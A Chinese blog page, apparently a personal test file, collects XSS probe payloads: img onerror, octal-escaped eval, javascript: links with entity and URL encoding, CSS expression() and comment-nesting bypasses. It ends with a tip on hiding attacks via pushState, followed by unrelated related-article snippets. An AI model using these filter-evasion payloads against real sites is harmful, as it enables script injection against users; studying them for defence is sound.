自测 基础 js 脚本。

<html>
<head>
<script>
//function(<text>a{[]}lert(‘x‘)</text>)()
document.write(‘ &lt;img [email protected] onerror=alert(123) /&gt; ‘);    //说明直接在<script>标签 不会解码HtmlEncode
eval("\141\154\145\162\164\50\47\61\47\51");    //转换为16进制或8进制
</script>
</head>

<body>
<pre>
<a href="javascript:alert(1)=html">click me1</a>

<a href="javascript:document.write(‘ &lt;img [email protected] onerror=alert(123) /&gt; ‘);">click me2</a>    说明JS对HtmlEncode进行解码

<a href="javascript:document.write(‘ <img [email protected] onerror=alert(123) /> ‘);">click me3</a>

<a href="javascript:document.write(‘ %3C%69%6D%67%20%73%72%63%3D%40%20%6F%6E%65%72%72%6F%72%3D%61%6C%65%72%74%28%31%32%33%29%20%2F%3E ‘);">click me4</a>

<a href="javascript:document.write(‘ %26%6C%74%3B%69%6D%67%20%73%72%63%3D%40%20%6F%6E%65%72%72%6F%72%3D%61%6C%65%72%74%28%31%32%33%29%20%2F%26%67%74%3B ‘);">click me5</a> 4,5对比,说明JS对unicode, 十六进制,十进制,URL解码 只会解码一次。

<XsS style="xssb:expression(alert(‘XsSb‘))">由于某些浏览器对XHTML支持,可以插入svg代码,XML代码。

111<!-- 222 <!-- 333 --> 444-->555    对于注释的闭合,绕过

HTML5中的history的pushState 和 replaceState 无刷新替换URL中链接, 再结合短链接, XSS攻击过程无任何察觉。
</pre>
</body>
</html>
时间: 2024-11-29 09:22:20

自测 基础 js 脚本。的相关文章

关于JS脚本语言的基础语法

JS脚本语言的基础语法:输出语法  alert("警告!");  confirm("确定吗?");   prompt("请输入密码");为弱类型语言: 开始时要嵌入JS代码:<script type="text/javascript"></script>: 关于写程序是需注意的基本语法:1.所有的字符全都是英文半角的:2.大部分情况下每条语句结束后要加分号:3.每一块代码结束后加换行:4.程序前呼后应:

Js脚本之jQuery学习笔记(1)

Js脚本之jQuery学习笔记(1) 一.javascript基础 单行注释 多行注释 /* */ 数据类型 数值型 字符串型 布尔型 空值 未定义值 转义字符 函数定义:1234567891011121314<head><script language="javascript"function test(m){var xixi="嘻嘻"alert("这是javascript")document.write(xixi + m)}

样式其他与JS脚本语言

样式其他:display(显示block和隐藏none,不占位置)  visibility(显示visible和隐藏hidden,占位置)  overflow(超出范围 hidden隐藏) 透明(opacity:0.5;-moz-opacity:0.5;filter:alpha(opacity=50)) 圆角(border-radius:5px;) 阴影(box-shadow:0 0 5px white;) JS脚本语言:  全称JavaScript:  网页里面使用的脚本语言     非常强大

9.12上午 JS脚本语言

JS脚本语言 JS脚本语言全称JavaScript,是网页里面使用的脚本语言,也是一门非常强大的语言. 一.基础语法 1.注释语法 单行注释:// 多行注释:/**/ 2.输出语法 ①alert(信息);效果是弹出信息 ②confirm(信息);效果是弹出一个和用户交互的对话框 ③prompt(信息):效果是弹出一个可以让用户输入的对话框 3.嵌入JS代码 嵌入JS代码时,要尽量靠下写,嵌入代码为<script type="text/javascript"></scr

JMeter基础--录制脚本

JMeter官方站点:http://jmeter.apache.org/ JMeter是一款在国外非常流行和受欢迎的开源性能测试工具,虽然与LoadRunner相比有很多不足,比如:它结果分析能力没有LoadRunner详细:但它的优点也有很多: 开源,他是一款开源的免费软件,使用它你不需要支付任何费用, 小巧,相比LR的庞大(最新LR11将近4GB),它非常小巧,不需要安装,但需要JDK环境,因为它是使用java开发的工具. 功能强大,jmeter设计之初只是一个简单的web性能测试工具,但经

异步执行js脚本——防止阻塞

JS允许我们修改页面中的所有方面:内容,样式和用户进行交互时的行为. 但是js同样可以阻塞DOM树的形成并且延迟页面的渲染. 让你的js变成异步执行,并且减少不必要的js文件从而提高性能. JavaScript可以查询和修改DOM和CSSOM JavaScript的执行阻塞了CSSOM的执行 JavaScript 阻塞了DOM的形成,除非特殊声明js异步执行 js是一个同步语言可以修改网页的任何方面: <html> <head> <meta name="viewpo

2款JS脚本判断手机浏览器跳转WAP手机网站

随着移动设备的普及,企业的网络宣传已经不能局限在PC端,而需要同时在移动端有所建树.对于公司网站来说,以前都是做的PC端的,当然手机等移动端也可以访问,但是用户体验肯定不如完全适合的手机端来的方便.我们在给自己的网站做了WAP手机网站之后,如果有用户通过手机访问我们的企业顶级域名网站,那就判断跳转到专为的WAP网站. 这里整理到目前自己在使用的2种JS脚本,因为之前一直有朋友跟我要,所以这里分享出来. 第一种:直接JS脚本 <script type="text/javascript&quo

js脚本语言

js脚本语言,全称javascript,网页里面使用的脚本语言,非常强大的语言,其中注释语法单行注释//,多行注释/*注释内容*/,输出语法alert(信息)起到弹出信息的作用,confirm弹出一个和用户交互的对话框,prompt弹出一个可以让用户输入的对话框,嵌入js代码的时候尽量靠下写,<script type="text/javascript"></script>,程序基本只是,所有的字符全部是英文半角的,大部分情况下每条语句结束之后要加分号.每块代码结

HTML 内嵌JS脚本

提供一个JS参考手册入口:http://www.w3school.com.cn/jsref/index.asp. JavaScript 最常用于图片操作.表单数据处理以及内容动态更新. <!DOCTYPE html> <html> <head>? <meta?charset="utf-8">? <title>菜鸟教程(runoob.com)</title>? </head> <body> &